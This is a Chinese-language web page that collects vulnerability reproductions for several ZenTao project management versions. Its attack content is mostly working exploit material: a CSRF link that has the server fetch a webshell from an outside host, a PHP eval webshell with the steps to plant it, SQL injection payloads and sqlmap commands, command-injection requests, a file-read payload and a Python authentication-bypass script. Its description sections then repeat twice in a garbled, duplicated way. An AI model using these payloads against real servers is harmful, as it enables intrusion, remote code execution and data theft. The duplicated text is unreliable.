禅道各版本漏洞复现与分析<\/h1>

目录<\/h2>

禅道12.4.2 CSRF漏洞 (CNVD-2020-68552)<\/a><\/li>
禅道12.4.2 后台任意文件上传漏洞 (CNVD-C-2020-121325)<\/a><\/li>
禅道16.5 router.class.php SQL注入漏洞<\/a><\/li>
禅道v18.0-v18.3 后台命令执行漏洞<\/a><\/li>
禅道18.5后台命令执行漏洞<\/a><\/li>
禅道20.7后台任意文件读取漏洞<\/a><\/li>
禅道21.1开源版SQL注入漏洞<\/a><\/li>

禅道项目管理系统远程命令执行漏洞 (CNVD-2023-02709)<\/a><\/li> <\/ol>

禅道12.4.2 CSRF漏洞 (CNVD-2020-68552)<\/h2>

漏洞描述<\/h3>
可以针对禅道的部分模块制造恶意URL地址发送给管理员，当管理员登录时会执行模块的恶意请求，可用于进行钓鱼请求。<\/p>

影响版本<\/h3>
禅道 <= 12.4.2版本<\/p>

http:\/\/xxx.xxx.xxx.xxx\/www\/index.php?mode=getconfig
<\/code><\/pre>

POC制作过程：<\/li>
<\/ol>
原始URL：
http:\/\/xxx.xxx.xxx.xxx\/www\/index.php?m=user&f=login&referer=\/www\/index.php.m=client&f=download&version=1&link=HTTP:\/\/peiqi.tech\/SHELL.php

将link参数base64加密：
http:\/\/xxx.xxx.xxx.xxx\/www\/index.php?m=user&f=login&referer=\/www\/index.php.m=client&f=download&version=1&link=SFRUUDovL3BlaXFpLnRlY2gvU0hFTEwucGhw

将referer参数以.做分割base64加密两边字符：
http:\/\/xxx.xxx.xxx.xxx\/www\/index.php?m=user&f=login&referer=L3d3dy9pbmRleC5waHA.bT1jbGllbnQmZj1kb3dubG9hZCZ2ZXJzaW9uPTEmbGluaz1TRlJVVURvdkwzQmxhWEZwTG5SbFkyZ3ZVMGhGVEV3dWNHaHc=
<\/code><\/pre>
漏洞分析<\/h3>
漏洞位于module\/common\/model.php<\/code>的checkPriv<\/code>方法中：<\/p>
public<\/span> function<\/span> checkPriv<\/span>() {
<\/span><\/span>    \/\/ ...
<\/span><\/span><\/span><\/span>    $referer =<\/span> helper<\/span>::<\/span>safe64Encode<\/span>($this-><\/span>app<\/span>-><\/span>getURI<\/span>(true<\/span>));
<\/span><\/span>    die<\/span>(js<\/span>::<\/span>locate<\/span>(helper<\/span>::<\/span>createLink<\/span>('user'<\/span>, 'login'<\/span>, "referer=<\/span>$referer<\/span>"<\/span>)));
<\/span><\/span>}
<\/span><\/span><\/code><\/pre>当调用当前权限不允许的方法时，会进行跳转，并在$referer<\/code>参数缓存调用的方法URL，当使用这个跳转的地址登录时则会直接调用此方法。<\/p>
禅道12.4.2 后台任意文件上传漏洞 (CNVD-C-2020-121325)<\/h2>
漏洞描述<\/h3>
登陆管理后台的恶意攻击者可以通过fopen\/fread\/fwrite方法读取或上传任意文件，成功利用此漏洞可以读取目标系统敏感文件或获得系统管理权限。<\/p>
影响版本<\/h3>
禅道 <= 12.4.2版本<\/p>
漏洞复现步骤<\/h3>

准备恶意文件shell.php<\/code>：<\/li>
<\/ol>
<?<\/span>php<\/span> @<\/span>eval<\/span>($_POST[1<\/span>]);echo<\/span> phpinfo<\/span>();?><\/span>
<\/span><\/span><\/span><\/code><\/pre>
启动HTTP服务：<\/li>
<\/ol>
python3 -m http.server 8000<\/span>
<\/span><\/span><\/code><\/pre>
对URL进行base64编码：<\/li>
<\/ol>
http:\/\/127.0.0.1:8000\/shell.php → aHR0cDovLzQzLjEzOS42Mi41Njo4MDAwL3NoZWxsLnBocA==
<\/code><\/pre>

构造POC URL：<\/li>
<\/ol>
http:\/\/123.58.224.8:63713\/zentao\/client-download-1-aHR0cDovL2QzLjEzOS42Mi31Nzo4MDAwL3NoZWxsLnBocA==-1.html
<\/code><\/pre>

访问木马文件：<\/li>
<\/ol>
http:\/\/123.58.224.8:63713\/zentao\/data\/client\/1\/shell.php
<\/code><\/pre>

使用蚁剑等工具连接。<\/li>
<\/ol>
禅道16.5 router.class.php SQL注入漏洞<\/h2>
漏洞描述<\/h3>
禅道V16.5未对输入的account参数内容作过滤校验，导致攻击者拼接恶意SQL语句执行。<\/p>
影响版本<\/h3>
禅道V16.5<\/p>
POC示例<\/h3>

延时POC：<\/li>
<\/ol>
http:\/\/ip:port\/index.php?account=admin' AND (SELECT 1337 FROM (SELECT(SLEEP(5)))a)-- b
<\/code><\/pre>

报错注入：<\/li>
<\/ol>
admin' and updatexml(1,concat(0x7e,(user),0x7e),1) and '1'='1
<\/code><\/pre>

使用SQLMap自动化检测：<\/li>
<\/ol>
python sqlmap.py -r request.txt --level=<\/span>5<\/span> --risk=<\/span>3<\/span> --threads=<\/span>10<\/span> --dbms=<\/span>mysql
<\/span><\/span><\/code><\/pre>禅道v18.0-v18.3 后台命令执行漏洞<\/h2>
漏洞描述<\/h3>
禅道后台存在RCE漏洞，存在于V18.0-18.3之间，漏洞来源于新增加的一个功能模块。<\/p>
影响版本<\/h3>
禅道V18.0-V18.3<\/p>
POC示例<\/h3>
POST<\/span> \/zentaopms\/www\/index.php?m=zahost&f=create HTTP<\/span>\/<\/span>1.1<\/span>
<\/span><\/span>Host:<\/span> xxx.xxx.xxx.xxx<\/span>
<\/span><\/span>Content-Type:<\/span> application\/x-www-form-urlencoded; charset=UTF-8<\/span>
<\/span><\/span>Cookie:<\/span> zentaosid=fwaf16g51w678678qw686;<\/span>
<\/span><\/span>
<\/span><\/span>vsoft=kvm&hostType=physical&name=penson&extranet=xxx.xxx.xxx.xxx%7Ccalc.exe&cpuCores=2&memory=16&diskSize=16&desc=&uid=640be59da4851&type=z
<\/span><\/span><\/code><\/pre>禅道18.5后台命令执行漏洞<\/h2>
漏洞描述<\/h3>
禅道18.5版本后台存在命令执行漏洞。<\/p>
影响版本<\/h3>
禅道18.5<\/p>
POC示例<\/h3>

第一步请求：<\/li>
<\/ol>
POST<\/span> \/zentaopms\/www\/index.php?m=custom&f=ajaxSaveCustomFields&module=common§ion=features&key=apiGetModel HTTP<\/span>\/<\/span>1.1<\/span>
<\/span><\/span>Host:<\/span> 192.168.234.128<\/span>
<\/span><\/span>Content-Type:<\/span> application\/x-www-form-urlencoded; charset=UTF-8<\/span>
<\/span><\/span>Cookie:<\/span> zentaosid=t33hnj6nnkdkjcid7rp3bdl63e;<\/span>
<\/span><\/span>
<\/span><\/span>fields=true
<\/span><\/span><\/code><\/pre>
第二步执行命令：<\/li>
<\/ol>
POST<\/span> \/zentaopms\/www\/index.php?m=api&f=getModel&moduleName=repo&methodName=checkConnection HTTP<\/span>\/<\/span>1.1<\/span>
<\/span><\/span>Host:<\/span> 192.168.234.128<\/span>
<\/span><\/span>Content-Type:<\/span> application\/x-www-form-urlencoded<\/span>
<\/span><\/span>Cookie:<\/span> zentaosid=t33hnj6nnkdkjcid7rp3bdl63e;<\/span>
<\/span><\/span>
<\/span><\/span>client=calc.exe&SCM=Subversion
<\/span><\/span><\/code><\/pre>禅道20.7后台任意文件读取漏洞<\/h2>
漏洞描述<\/h3>
禅道20.7后台存在任意文件读取漏洞，但只能读取网站目录下的文件。<\/p>
影响版本<\/h3>
禅道20.7<\/p>
POC示例<\/h3>
http:\/\/192.168.91.1:8017\/index.php?m=editor&f=edit&filePath=Li4vLi4vY29uZmlnL215LnBocA==&action=extendOther&isExtends=3
<\/code><\/pre>
禅道21.1开源版SQL注入漏洞<\/h2>
漏洞描述<\/h3>
禅道21.1 module\search\control.php在againstCond的拼接过程中，每个单词被直接添加到查询条件中，没有进行任何过滤或转义处理。<\/p>
影响版本<\/h3>
禅道21.1开源版<\/p>
POC示例<\/h3>
GET<\/span> \/index.php?m=search&f=index&words=1&type=all&zin=1 HTTP<\/span>\/<\/span>1.1<\/span>
<\/span><\/span>Host:<\/span> 192.168.88.6<\/span>
<\/span><\/span>Cookie:<\/span> zentaosid=d5ikdmm295l1ca5ec4an8p4f7u;<\/span>
<\/span><\/span><\/code><\/pre>使用SQLMap检测：<\/p>
python sqlmap.py -r 1.txt --level=<\/span>5<\/span> --risk=<\/span>3<\/span> --threads=<\/span>10<\/span> --dbms=<\/span>mysql
<\/span><\/span><\/code><\/pre>禅道项目管理系统远程命令执行漏洞 (CNVD-2023-02709)<\/h2>
漏洞描述<\/h3>
禅道项目管理系统存在远程命令执行漏洞，该漏洞源于在认证过程中未正确退出程序，导致了认证绕过，并且后台中有多种执行命令的方式。<\/p>
影响版本<\/h3>

开源版：>=17.4,<=18.0.beta1<\/li>
企业版：>=7.4,<=8.0.beta1<\/li>
旗舰版：>=3.4,<=4.0.beta1<\/li>
<\/ul>
漏洞复现<\/h3>

权限绕过代码：<\/li>
<\/ol>
import<\/span> requests
<\/span><\/span>
<\/span><\/span>header =<\/span> {
<\/span><\/span>    'User-Agent'<\/span>:'Mozilla\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\/537.36 (KHTML, like Gecko) Chrome\/108.0.5408.146 Safari\/537.36'<\/span>,
<\/span><\/span>}
<\/span><\/span>
<\/span><\/span>def<\/span> bypasscookie<\/span>(url,session):
<\/span><\/span>    target =<\/span> url +<\/span> "\/index.php?m=misc&f=captcha&sessionVar=user"<\/span>
<\/span><\/span>    r =<\/span> session.<\/span>get(target, headers=<\/span>header)
<\/span><\/span>    zentaosid =<\/span> r.<\/span>cookies.<\/span>get_dict()['zentaosid'<\/span>]
<\/span><\/span>    print(zentaosid)
<\/span><\/span>    header["Cookie"<\/span>] =<\/span> "zentaosid="<\/span> +<\/span> zentaosid
<\/span><\/span>    resp =<\/span> session.<\/span>get(url +<\/span> "\/index.php?m=my&f=index"<\/span>, headers=<\/span>header)
<\/span><\/span>    if<\/span> "\/shandao\/www\/index.php?m=user&f=login"<\/span> not<\/span> in<\/span> resp.<\/span>text:
<\/span><\/span>        print("绕过登陆验证"<\/span>)
<\/span><\/span>    else<\/span>:
<\/span><\/span>        print("无法绕过验证"<\/span>)
<\/span><\/span>
<\/span><\/span>if<\/span> __name__ ==<\/span> '__main__'<\/span>:
<\/span><\/span>    url =<\/span> "http:\/\/127.0.0.1:8081\/shandao\/www\/"<\/span>
<\/span><\/span>    session =<\/span> requests.<\/span>Session()
<\/span><\/span>    bypasscookie(url,session)
<\/span><\/span><\/code><\/pre>
后台RCE步骤：<\/li>
<\/ol>

先创建Gitlab代码库，拿到repoID<\/li>
然后编辑该仓库，在client参数中注入命令<\/li>
<\/ul>
POST<\/span> \/shandao\/www\/index.php?m=repo&f=edit&repoID=8&objectID=0&tid=rmqcl0ss HTTP<\/span>\/<\/span>1.1<\/span>
<\/span><\/span>Host:<\/span> 127.0.0.1:8081<\/span>
<\/span><\/span>Content-Type:<\/span> application\/x-www-form-urlencoded; charset=UTF-8<\/span>
<\/span><\/span>Cookie:<\/span> zentaosid=r3094u5448167shtdrur4c7b6q;<\/span>
<\/span><\/span>
<\/span><\/span>product%5B%5D=1&SCM=Subversion&serviceHost=&name=wangnima2333&path=http%3A%2F%2F123.4.5.6&encoding=utf-8&client=%60open+%2FSystem%2FApplications%2FCalculator.app%60&account=&password=&encrypt=base64&desc=&uid=63e4a26b5fd65
<\/span><\/span><\/code><\/pre>

禅道各版本漏洞复现与分析<\/h1>

禅道12.4.2 CSRF漏洞 (CNVD-2020-68552)<\/h2>

漏洞描述<\/h3> 可以针对禅道的部分模块制造恶意URL地址发送给管理员，当管理员登录时会执行模块的恶意请求，可用于进行钓鱼请求。<\/p>

影响版本<\/h3> 禅道 <= 12.4.2版本<\/p>

漏洞描述<\/h3> 登陆管理后台的恶意攻击者可以通过fopen\/fread\/fwrite方法读取或上传任意文件，成功利用此漏洞可以读取目标系统敏感文件或获得系统管理权限。<\/p>

影响版本<\/h3> 禅道 <= 12.4.2版本<\/p>

禅道16.5 router.class.php SQL注入漏洞<\/h2>

漏洞描述<\/h3> 禅道V16.5未对输入的account参数内容作过滤校验，导致攻击者拼接恶意SQL语句执行。<\/p>

影响版本<\/h3> 禅道V16.5<\/p>

禅道v18.0-v18.3 后台命令执行漏洞<\/h2>

漏洞描述<\/h3> 禅道后台存在RCE漏洞，存在于V18.0-18.3之间，漏洞来源于新增加的一个功能模块。<\/p>

影响版本<\/h3> 禅道V18.0-V18.3<\/p>

禅道18.5后台命令执行漏洞<\/h2>

漏洞描述<\/h3> 禅道18.5版本后台存在命令执行漏洞。<\/p>

影响版本<\/h3> 禅道18.5<\/p>

禅道20.7后台任意文件读取漏洞<\/h2>

漏洞描述<\/h3> 禅道20.7后台存在任意文件读取漏洞，但只能读取网站目录下的文件。<\/p>

影响版本<\/h3> 禅道20.7<\/p>

禅道21.1开源版SQL注入漏洞<\/h2>

漏洞描述<\/h3> 禅道21.1 module\search\control.php在againstCond的拼接过程中，每个单词被直接添加到查询条件中，没有进行任何过滤或转义处理。<\/p>

影响版本<\/h3> 禅道21.1开源版<\/p>

禅道项目管理系统远程命令执行漏洞 (CNVD-2023-02709)<\/h2>

漏洞描述<\/h3> 禅道项目管理系统存在远程命令执行漏洞，该漏洞源于在认证过程中未正确退出程序，导致了认证绕过，并且后台中有多种执行命令的方式。<\/p>

漏洞描述<\/h3>
可以针对禅道的部分模块制造恶意URL地址发送给管理员，当管理员登录时会执行模块的恶意请求，可用于进行钓鱼请求。<\/p>

影响版本<\/h3>
禅道 <= 12.4.2版本<\/p>

漏洞描述<\/h3>
登陆管理后台的恶意攻击者可以通过fopen\/fread\/fwrite方法读取或上传任意文件，成功利用此漏洞可以读取目标系统敏感文件或获得系统管理权限。<\/p>

影响版本<\/h3>
禅道 <= 12.4.2版本<\/p>

漏洞描述<\/h3>
禅道V16.5未对输入的account参数内容作过滤校验，导致攻击者拼接恶意SQL语句执行。<\/p>

影响版本<\/h3>
禅道V16.5<\/p>

漏洞描述<\/h3>
禅道后台存在RCE漏洞，存在于V18.0-18.3之间，漏洞来源于新增加的一个功能模块。<\/p>

影响版本<\/h3>
禅道V18.0-V18.3<\/p>

漏洞描述<\/h3>
禅道18.5版本后台存在命令执行漏洞。<\/p>

影响版本<\/h3>
禅道18.5<\/p>

漏洞描述<\/h3>
禅道20.7后台存在任意文件读取漏洞，但只能读取网站目录下的文件。<\/p>

影响版本<\/h3>
禅道20.7<\/p>

漏洞描述<\/h3>
禅道21.1 module\search\control.php在againstCond的拼接过程中，每个单词被直接添加到查询条件中，没有进行任何过滤或转义处理。<\/p>

影响版本<\/h3>
禅道21.1开源版<\/p>

漏洞描述<\/h3>
禅道项目管理系统存在远程命令执行漏洞，该漏洞源于在认证过程中未正确退出程序，导致了认证绕过，并且后台中有多种执行命令的方式。<\/p>